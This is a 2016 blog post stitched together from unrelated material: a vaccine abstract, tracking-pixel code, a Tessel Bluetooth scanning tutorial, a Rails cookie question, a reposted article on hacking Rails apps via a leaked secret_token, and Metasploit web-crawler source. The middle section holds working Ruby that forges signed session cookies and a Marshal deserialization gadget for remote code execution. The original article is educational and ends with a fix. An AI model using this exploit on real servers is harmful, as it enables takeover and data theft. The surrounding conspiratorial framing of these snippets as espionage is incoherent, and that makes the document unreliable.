Sunday, September 25, 2016

T-cell-inducing vaccines - what's the future ...

SEARCHING FOR IMMORTALITY

Abstract

In the twentieth century vaccine development has moved from the use of attenuated or killed micro-organisms to protein sub-unit vaccines, with vaccine immunogenicity assessed by measuring antibodies induced by vaccination. However, for many infectious diseases T cells are an important part of naturally acquired protective immune responses, and inducing these by vaccination has been the aim of much research. The progress that has been made in developing effective T-cell-inducing vaccines against viral and parasitic diseases such as HIV and malaria is discussed, along with recent developments in therapeutic vaccine development for chronic viral infections and cancer. Although many ways of inducing T cells by vaccination have been assessed, the majority result in low level, non-protective responses. Sufficient clinical research has now been conducted to establish that replication-deficient viral vectored vaccines lead the field in inducing strong and broad responses, and efficacy studies of T-cell-inducing vaccines against a number of diseases are finally demonstrating that this is a valid approach to filling the gaps in our defence against not only infectious disease, but some forms of cancer.
© 2011 The Author. Immunology © 2011 Blackwell Publishing Ltd.


the tracking pixel

A tracking pixel is a graphic that usually measures only 1x1 pixel. It is so small that visitors to a website or recipients of an email can hardly see it. To remain hidden, tracking pixels are often partly or fully transparent, or camouflaged in the background colour of the website. Users are generally not supposed to see the tracking pixel.
The tracking pixel URL points to the location on the server where the image is stored. When the user visits a website, the image referenced by the tag is loaded from this server.


Tracking pixels within the source code might look like this:
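A minimal sketch of such a tag, built here in Ruby; the tracker.example.com endpoint and the query parameters are invented for illustration, not taken from any real tracker:

```ruby
# Hypothetical tracking pixel tag; tracker.example.com and the
# parameters are assumptions for illustration only.
require "cgi"

params = { "campaign" => "newsletter-42", "recipient" => "user@example.com" }
query  = params.map { |k, v| "#{CGI.escape(k)}=#{CGI.escape(v)}" }.join("&")

pixel_tag = %(<img src="https://tracker.example.com/open.gif?#{query}" ) +
            %(width="1" height="1" style="display:none" alt="">)
puts pixel_tag
```

When a mail client or browser renders the tag it requests open.gif from the server, and the query string tells the tracker who opened what.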
 
PART OF THE DETECTION CODE:
 
 var extension = (/[.]/.exec(href)) ? /[^.]+$/.exec(href) : undefined;
                    var filePath = href;
                    _gaq.push(['_trackEvent', 'Download', 'Click-' + extension, filePath]);
                    // If the link does not open in a new tab, delay navigation
                    // so the tracking request has time to fire
                    if (jQuery(this).attr('target') !== '_blank') {
                        setTimeout(function() { location.href = filePath; }, 200);
                        return false;
                    }

THEY USE THIS PROTOCOL:

 
Eddystone-UID frame broadcasts
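For context, an Eddystone-UID frame is a small service-data payload: a frame-type byte (0x00), a calibrated TX power byte, a 10-byte namespace ID and a 6-byte instance ID. A minimal decoding sketch; the sample bytes below are made up:

```ruby
# Decode an Eddystone-UID service-data frame (the bytes following the
# 0xFEAA service UUID). The sample frame is invented for illustration.
def parse_eddystone_uid(bytes)
  raise ArgumentError, "not a UID frame" unless bytes[0] == 0x00
  {
    # TX power is a signed byte: calibrated signal strength in dBm at 0 m
    tx_power:  bytes[1] > 127 ? bytes[1] - 256 : bytes[1],
    namespace: bytes[2, 10].map { |b| format("%02x", b) }.join,
    instance:  bytes[12, 6].map { |b| format("%02x", b) }.join
  }
end

frame = [0x00, 0xEE] + [0xAA] * 10 + [0x01] * 6
p parse_eddystone_uid(frame)
```

The namespace/instance split is what lets a scanner recognise a fleet of beacons and then tell individual beacons apart.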


AND THIS TOP-LEVEL ESPIONAGE OVER BLUETOOTH


BLE

Step 1
Make a directory inside your "tessel-code" folder: enter mkdir ble into your command line, then change directory into that folder: cd ble
Step 2
Plug the BLE module into Tessel port A with the hexagon/icon side down and the electrical components on the top, then plug Tessel into your computer via USB.
Step 3
Install by typing npm install ble-ble113a into the command line.
Step 4
Save this code in a text file called ble.js:
// Any copyright is dedicated to the Public Domain.
// http://creativecommons.org/publicdomain/zero/1.0/

/*********************************************
This Bluetooth Low Energy module demo scans
for nearby BLE peripherals. Much more fun if
you have some BLE peripherals around.
*********************************************/

var tessel = require('tessel');
var blelib = require('ble-ble113a');

var ble = blelib.use(tessel.port['A']);

ble.on('ready', function(err) {
  console.log('Scanning...');
  ble.startScanning();
});

ble.on('discover', function(peripheral) {
  console.log("Discovered peripheral!", peripheral.toString());
});
Step 5
In your command line, run tessel run ble.js
Set a Bluetooth Low Energy device to advertising and see if Tessel can find it!

Bonus: Change the code to print out only the address of discovered peripherals.

To see what else you can do with the BLE module, see the module docs here.


http://start.tessel.io/modules/ble 

ALTHOUGH THEY WORK ON ORACLE 11g so... I am using Ruby on Rails 3 and I would like to use the cookies.signed method in a Rack middleware. I need that because I would like to authenticate a user directly in the middleware instead of using a before_filter in the application_controller.rb file.

Ruby on Rails Known Secret Session Cookie Remote Code Execution

This module implements Remote Command Execution on Ruby on Rails applications. Prerequisite is knowledge of the "secret_token" (Rails 2/3) or "secret_key_base" (Rails 4). The values for those can be usually found in the file "RAILS_ROOT/config/initializers/secret_token.rb". The module achieves RCE by deserialization of a crafted Ruby Object.

https://www.rapid7.com/db/modules/exploit/multi/http/rails_secret_deserialization 


How to hack a Rails app using its secret_token

22 Jul 2013
Create a new Rails app, open /config/initializers/secret_token.rb and you’ll see your app’s secret_token. As I will show you, if anyone who wishes you harm gets hold of this string then they can execute arbitrary code on your server. Troublingly, by default Rails includes it in your version control, and if you don’t remove it then anyone who gets or is given access to your codebase has complete control over your server. Maybe you added them to your private repo for a code review, or unthinkingly put a side-project production app into a public repo, or someone sneaked a look at your Sublime while you were out. It doesn’t matter - if they have this key then they own you.

Why your secret_token is important - session cookies

Your secret_token is used for verifying the integrity of your app’s session cookies. A session cookie will look something like:
_MyApp_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTcyZTAwMmRjZTg2NTBiZmI0M2UwZmY0MjEyNGJjODBhBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWhmYTBKSGQwYVQxRlhnTFZWK2FEZEVhbEtLbDBMSitoVEo5YU4zR2dxM3M9BjsARg%3D%3D--dc40a55cd52fe32bb3b84ae0608956dfb5824689
The cookie value (the part after the =) is split into 2 parts, separated by --. The first part is a Base64 encoded serialization of the hash that Rails will use as the session variable in controllers. The second part is a signature created using secret_token, that Rails uses to check that the cookie it has been passed is legit. This prevents users from forging nefarious cookies and from tricking Rails into loading data it doesn’t want to load. Unless of course they have your secret_token and can also forge the signature…

The serialized session hash

The first part of the cookie is a Marshal dump of the session hash, encoded in Base64. Marshal is a Ruby object serialization format that is used here to allow Rails to persist objects between requests made in the same session. In many cases it will only store the session_id, _csrf_token and Warden authentication data, but calling session["foo"] = "bar" in your controllers allows you to store pretty much anything you want. For my cookie above, unescaping the URL encoding and then Base64 decoding gives:
"\x04\b{\aI\"\x0Fsession_id\x06:\x06EFI\"%72e002dce8650bfb43e0ff42124bc80a\x06;\x00TI\"\x10_csrf_token\x06;\x00FI\"1hfa0JHd0aT1FXgLVV+aDdEalKKl0LJ+hTJ9aN3Ggq3s=\x06;\x00F"
which if you squint hard enough is indeed starting to look kind of like a hash. This cookie is passed up to the server with each request, Rails calls Marshal.load on it, and merrily populates session with whatever serialized objects it is passed. Object persistence between requests. Brilliant.
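The decode described above can be reproduced in a few lines of Ruby, using the example cookie value from earlier (Marshal format 4.8, which any modern Ruby can load):

```ruby
require "base64"
require "cgi"

# The first part of the example session cookie quoted above.
data = "BAh7B0kiD3Nlc3Npb25faWQGOgZFRkkiJTcyZTAwMmRjZTg2NTBiZmI0M2UwZmY0MjEyNGJjODBhBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMWhmYTBKSGQwYVQxRlhnTFZWK2FEZEVhbEtLbDBMSitoVEo5YU4zR2dxM3M9BjsARg%3D%3D"

# Never call Marshal.load on untrusted input -- that is the whole point
# of this article. Here we are decoding a cookie we made ourselves.
session = Marshal.load(Base64.decode64(CGI.unescape(data)))
p session["session_id"]  # => "72e002dce8650bfb43e0ff42124bc80a"
```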

The signature

But wait, the cookie obviously lives on the client side, which means that a user can set it to be anything they want. Which means that the user can pass in whatever serialized object they want to our app. And by the time we reinflate it and realise that they have passed us a small thermonuclear device, it will be too late and the attacker will be able to execute arbitrary code on our server.
That’s where our secret_token and the second part of the cookie value (the part after the --) come in. Whenever Rails gets a session cookie, it checks that it hasn’t been tampered with by verifying that the HMAC digest of the first part of the cookie with its secret_token matches the second, signature part. This means in order to craft a nefarious cookie an attacker would need to know the app’s secret_token. Unfortunately, just being called secret_token doesn’t make it secret, and, as already discussed, if you aren’t careful then it can easily end up somewhere you don’t want it to.
If you know an app’s secret_token and want to forge a valid cookie, you simply need to reverse the above process:
require "net/http"
require "uri"
require "base64"
require "cgi"
require "openssl"

secret_token = "stolen-from-github-or-somewhere"

# Construct your evil hash
my_evil_session_hash = {
    "ive_made_a_huge_mistake" => true
}

# Serialize your hash
marshal_dump = Marshal.dump(my_evil_session_hash)

# Base64 encode this dump
unescaped_cookie_value = Base64.encode64(marshal_dump)

# Escape any troublesome characters and remove line breaks altogether
escaped_cookie_value = CGI.escape(unescaped_cookie_value).gsub("%0A", "")

# Calculate the signature using the HMAC digest of the secret_token and the escaped cookie value. Replace %3D with equals signs.
cookie_signature = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret_token, escaped_cookie_value.gsub("%3D", "="))

# Construct your evil cookie by concatenating the value with the signature
my_evil_cookie = "_MyApp_session=#{escaped_cookie_value}--#{cookie_signature}"

# BOMBS AWAY
url = URI.parse("http://myapp.com/") # Make sure you have a trailing / if you are sending to the root path

req = Net::HTTP::Get.new(url.path)
req.add_field("Cookie", my_evil_cookie)

res = Net::HTTP.new(url.host, url.port).start do |http|
    http.request(req)
end
This request will load my_evil_session_hash into session, which is, purely on principle, not good. But loading arbitrary strings and integers is not about to melt any servers. How can you choose the contents of your hash so as to actually do some damage? Some obscure objects buried deep inside Rails are happy to oblige:
   
# Thanks to the folks at CodeClimate for pointing this out

# The code in the ERB will run when Rails unserializes it
erb = ERB.allocate
erb.instance_variable_set :@src, "User.steal_all_passwords; User.email_spam_to_all_users;"

proxy = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
my_evil_session_hash = {
    "proxy_of_death" => Marshal.dump(proxy)
}
# ... continue as above
And presto.

Knowing is half the battle

ALL of this trouble can be trivially avoided by taking secret_token out of your version control. Put it into an environment variable (dotenv is handy for local, it’s easy on Heroku too) and you can sleep (a bit more) soundly at night. If you suspect that someone you wouldn’t want to meet on a dark night knows your secret_token then you can simply change it. All your existing cookies will be invalidated, but nothing else bad will happen. Of course, you still don’t want anyone you don’t trust to get any kind of access to your codebase at all. But you can at least make life difficult for them even if they do.

Thanks to

Rails Security by Code Climate and TechBrahmana
Discussion on Hacker News

http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/  
 
AND FINALLY:
 
http://stackoverflow.com/questions/5343208/how-to-use-cookies-in-a-rack-middleware 
 
 
It looks like you should be able to do this:
  request = ActionDispatch::Request.new(env)
  request.cookie_jar.signed[:user_id] #=> 1
You can check out .../action_dispatch/middleware/cookies.rb on github to read more about exactly what is going on.
 



AND THEREFORE

Metasploit Web Crawler 2016-03-08T13:02:44
ID MSF:AUXILIARY/CRAWLER/MSFCRAWLER
Type metasploit
Reporter Rapid7

Description

This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.

Module Name

MSF:AUXILIARY/CRAWLER/MSFCRAWLER
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Web Crawler.
#
# Author:  Efrain Torres   et [at] metasploit.com 2010
#
#

# openssl before rubygems mac os
require 'msf/core'
require 'openssl'
require 'rinda/tuplespace'
require 'pathname'
require 'uri'

class MetasploitModule < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(update_info(info,
      'Name'   => 'Metasploit Web Crawler',
      'Description'       => 'This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.',
      'Author'   => 'et',
      'License'   => MSF_LICENSE
    ))

    register_options([
      OptString.new('PATH', [true, "Starting crawling path", '/']),
      OptInt.new('RPORT', [true, "Remote port", 80 ])
    ], self.class)

    register_advanced_options([
      OptPath.new('CrawlerModulesDir', [true, 'The base directory containing the crawler modules',
        File.join(Msf::Config.data_directory, "msfcrawler")
      ]),
      OptBool.new('EnableUl', [ false, "Enable maximum number of requests per URI", true ]),
      OptBool.new('StoreDB', [ false, "Store requests in database", false ]),
      OptInt.new('MaxUriLimit', [ true, "Max. number of requests per URI", 10]),
      OptInt.new('SleepTime', [ true, "Sleep time (secs) between requests", 0]),
      OptInt.new('TakeTimeout', [ true, "Timeout for loop ending", 15]),
      OptInt.new('ReadTimeout', [ true, "Read timeout (-1 forever)", 3]),
      OptInt.new('ThreadNum', [ true, "Number of threads", 20]),
      OptString.new('DontCrawl', [true, "Filetypes not to crawl", '.exe,.zip,.tar,.bz2,.run,.asc,.gz'])
    ], self.class)
  end

  attr_accessor :ctarget, :cport, :cssl

  def run
    i, a = 0, []

    self.ctarget = datastore['RHOSTS']
    self.cport = datastore['RPORT']
    self.cssl = datastore['SSL']
    inipath = datastore['PATH']

    cinipath = (inipath.nil? or inipath.empty?) ? '/' : inipath

    inireq = {
        'rhost'  => ctarget,
        'rport'  => cport,
        'uri'   => cinipath,
        'method'    => 'GET',
        'ctype'  => 'text/plain',
        'ssl'  => cssl,
        'query'  => nil,
        'data'  => nil
    }

    @NotViewedQueue = Rinda::TupleSpace.new
    @ViewedQueue = Hash.new
    @UriLimits = Hash.new
    @current_site = self.ctarget

    insertnewpath(inireq)

    print_status("Loading modules: #{datastore['CrawlerModulesDir']}")
    load_modules(datastore['CrawlerModulesDir'])
    print_status("OK")

    if datastore['EnableUl']
      print_status("URI LIMITS ENABLED: #{datastore['MaxUriLimit']} (Maximum number of requests per uri)")
    end

    print_status("Target: #{self.ctarget} Port: #{self.cport} Path: #{cinipath} SSL: #{self.cssl}")


    begin
      reqfilter = reqtemplate(self.ctarget,self.cport,self.cssl)

      i =0

      loop do

        ####
        #if i <= datastore['ThreadNum']
        # a.push(Thread.new {
        ####

        hashreq = @NotViewedQueue.take(reqfilter, datastore['TakeTimeout'])

        ul = false
        if @UriLimits.include?(hashreq['uri']) and datastore['EnableUl']
          #puts "Request #{@UriLimits[hashreq['uri']]}/#{$maxurilimit} #{hashreq['uri']}"
          if @UriLimits[hashreq['uri']] >= datastore['MaxUriLimit']
            #puts "URI LIMIT Reached: #{$maxurilimit} for uri #{hashreq['uri']}"
            ul = true
          end
        else
          @UriLimits[hashreq['uri']] = 0
        end

        if !@ViewedQueue.include?(hashsig(hashreq)) and !ul

          @ViewedQueue[hashsig(hashreq)] = Time.now
          @UriLimits[hashreq['uri']] += 1

          if !File.extname(hashreq['uri']).empty? and datastore['DontCrawl'].include? File.extname(hashreq['uri'])
            vprint_status "URI not crawled #{hashreq['uri']}"
          else
              prx = nil
              #if self.useproxy
              # prx = "HTTP:"+self.proxyhost.to_s+":"+self.proxyport.to_s
              #end

              c = Rex::Proto::Http::Client.new(
                self.ctarget,
                self.cport.to_i,
                {},
                self.cssl,
                nil,
                prx
              )

              sendreq(c,hashreq)
          end
        else
          vprint_line "#{hashreq['uri']} already visited. "
        end

        ####
        #})

        #i += 1
        #else
        # sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty?
        # i = 0
        #end
        ####

      end
    rescue Rinda::RequestExpiredError
      print_status("END.")
      return
    end

    print_status("Finished crawling")
  end

  def reqtemplate(target,port,ssl)
    hreq = {
      'rhost'  => target,
      'rport'  => port,
      'uri'    => nil,
      'method'    => nil,
      'ctype'  => nil,
      'ssl'  => ssl,
      'query'  => nil,
      'data'  => nil
    }

    return hreq
  end

  def storedb(hashreq,response,dbpath)

    info = {
      :web_site => @current_site,
      :path     => hashreq['uri'],
      :query    => hashreq['query'],
      :data => hashreq['data'],
      :code     => response['code'],
      :body     => response['body'],
      :headers  => response['headers']
    }

    #if response['content-type']
    # info[:ctype] = response['content-type'][0]
    #end

    #if response['set-cookie']
    # info[:cookie] = page.headers['set-cookie'].join("\n")
    #end

    #if page.headers['authorization']
    # info[:auth] = page.headers['authorization'].join("\n")
    #end

    #if page.headers['location']
    # info[:location] = page.headers['location'][0]
    #end

    #if page.headers['last-modified']
    # info[:mtime] = page.headers['last-modified'][0]
    #end

    # Report the web page to the database
    report_web_page(info)
  end

  #
  # Modified version of load_protocols from psnuffle by Max Moser @remote-exploit.org
  #

  def load_modules(crawlermodulesdir)

    base = crawlermodulesdir
    if (not File.directory?(base))
      raise RuntimeError,"The Crawler modules parameter is set to an invalid directory"
    end

    @crawlermodules = {}
    cmodules = Dir.new(base).entries.grep(/\.rb$/).sort
    cmodules.each do |n|
      f = File.join(base, n)
      m = ::Module.new
      begin
        m.module_eval(File.read(f, File.size(f)))
        m.constants.grep(/^Crawler(.*)/) do
          cmod = $1
          klass = m.const_get("Crawler#{cmod}")
          @crawlermodules[cmod.downcase] = klass.new(self)

          print_status("Loaded crawler module #{cmod} from #{f}...")
        end
      rescue ::Exception => e
        print_error("Crawler module #{n} failed to load: #{e.class} #{e} #{e.backtrace}")
      end
    end
  end

  def sendreq(nclient,reqopts={})

    begin
      r = nclient.request_raw(reqopts)
      resp = nclient.send_recv(r, datastore['ReadTimeout'])

      if resp
        #
        # Quickfix for bug packet.rb to_s line: 190
        # In case modules or crawler calls to_s on de-chunked responses
        #
        resp.transfer_chunked = false

        if datastore['StoreDB']
          storedb(reqopts,resp,$dbpathmsf)
        end

        print_status ">> [#{resp.code}] #{reqopts['uri']}"

        if reqopts['query'] and !reqopts['query'].empty?
          print_status ">>> [Q] #{reqopts['query']}"
        end

        if reqopts['data']
          print_status ">>> [D] #{reqopts['data']}"
        end

        case resp.code
        when 200
          @crawlermodules.each_key do |k|
            @crawlermodules[k].parse(reqopts,resp)
          end
        when 301..303
          print_line("[#{resp.code}] Redirection to: #{resp['Location']}")
          vprint_status urltohash('GET',resp['Location'],reqopts['uri'],nil)
          insertnewpath(urltohash('GET',resp['Location'],reqopts['uri'],nil))
        when 404
          print_status "[404] Invalid link #{reqopts['uri']}"
        else
          print_status "Unhandled #{resp.code}"
        end

      else
        print_status "No response"
      end
      sleep(datastore['SleepTime'])
    rescue
      print_status "ERROR"
      vprint_status "#{$!}: #{$!.backtrace}"
    end
  end

  #
  # Add new path (uri) to test non-viewed queue
  #

  def insertnewpath(hashreq)

    hashreq['uri'] = canonicalize(hashreq['uri'])

    if hashreq['rhost'] == datastore['RHOSTS'] and hashreq['rport'] == datastore['RPORT']
      if !@ViewedQueue.include?(hashsig(hashreq))
        if @NotViewedQueue.read_all(hashreq).size > 0
          vprint_status "Already in queue to be viewed: #{hashreq['uri']}"
        else
          vprint_status "Inserted: #{hashreq['uri']}"

          @NotViewedQueue.write(hashreq)
        end
      else
        vprint_status "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}"
      end
    end
  end

  #
  # Build a new hash for a local path
  #

  def urltohash(m,url,basepath,dat)

      # m:   method
      # url: uri?[query]
      # basepath: base path/uri to determine absolute path when relative
      # data: body data, nil if GET and query = uri.query

      uri = URI.parse(url)
      uritargetssl = (uri.scheme == "https") ? true : false

      uritargethost = uri.host
      if (uri.host.nil? or uri.host.empty?)
        uritargethost = self.ctarget
        uritargetssl = self.cssl
      end

      uritargetport = uri.port
      if (uri.port.nil?)
        uritargetport = self.cport
      end

      uritargetpath = uri.path
      if (uri.path.nil? or uri.path.empty?)
        uritargetpath = "/"
      end

      newp = Pathname.new(uritargetpath)
      oldp = Pathname.new(basepath)
      if !newp.absolute?
        if oldp.to_s[-1,1] == '/'
          newp = oldp+newp
        else
          if !newp.to_s.empty?
            newp = File.join(oldp.dirname,newp)
          end
        end
      end

      hashreq = {
        'rhost'  => uritargethost,
        'rport'  => uritargetport,
        'uri'   => newp.to_s,
        'method'    => m,
        'ctype'  => 'text/plain',
        'ssl'  => uritargetssl,
        'query'  => uri.query,
        'data'  => nil
      }

      if m == 'GET' and !dat.nil?
        hashreq['query'] = dat
      else
        hashreq['data'] = dat
      end

      return hashreq
  end

  # Taken from http://www.ruby-forum.com/topic/140101 by  Rob Biedenharn
  def canonicalize(uri)

    u = uri.kind_of?(URI) ? uri : URI.parse(uri.to_s)
    u.normalize!
    newpath = u.path
    while newpath.gsub!(%r{([^/]+)/\.\./?}) { |match|
      $1 == '..' ? match : ''
    } do end
    newpath = newpath.gsub(%r{/\./}, '/').sub(%r{/\.\z}, '/')
    u.path = newpath
    # Ugly fix
    u.path = u.path.gsub("\/..\/","\/")
    u.to_s
  end

  def hashsig(hashreq)
    hashreq.to_s
  end

end

class BaseParser
  attr_accessor :crawler

  def initialize(c)
    self.crawler = c
  end

  def parse(request,result)
    nil
  end

  #
  # Add new path (uri) to test hash queue
  #
  def insertnewpath(hashreq)
    self.crawler.insertnewpath(hashreq)
  end

  def hashsig(hashreq)
    self.crawler.hashsig(hashreq)
  end

  def urltohash(m,url,basepath,dat)
    self.crawler.urltohash(m,url,basepath,dat)
  end

  def targetssl
    self.crawler.cssl
  end

  def targetport
    self.crawler.cport
  end

  def targethost
    self.crawler.ctarget
  end

  def targetinipath
    self.crawler.cinipath
  end
end
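As a side note, the canonicalize method above can be exercised on its own. A small standalone sketch (the URL is invented) showing what the URI#normalize! call plus the "../" collapsing loop actually produce:

```ruby
require "uri"

# Standalone version of the path normalization used in canonicalize above.
def canonicalize(uri)
  u = uri.kind_of?(URI) ? uri : URI.parse(uri.to_s)
  u.normalize!                       # downcases scheme/host, tidies the path
  newpath = u.path
  # Collapse "segment/../" pairs until none remain
  while newpath.gsub!(%r{([^/]+)/\.\./?}) { |match|
    $1 == '..' ? match : ''
  } do end
  u.path = newpath.gsub(%r{/\./}, '/').sub(%r{/\.\z}, '/')
  u.to_s
end

puts canonicalize("HTTP://Example.COM/a/b/../c/./d")  # => "http://example.com/a/c/d"
```

This is why the crawler's visited-queue does not treat /a/c/d and /a/b/../c/./d as two different pages.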
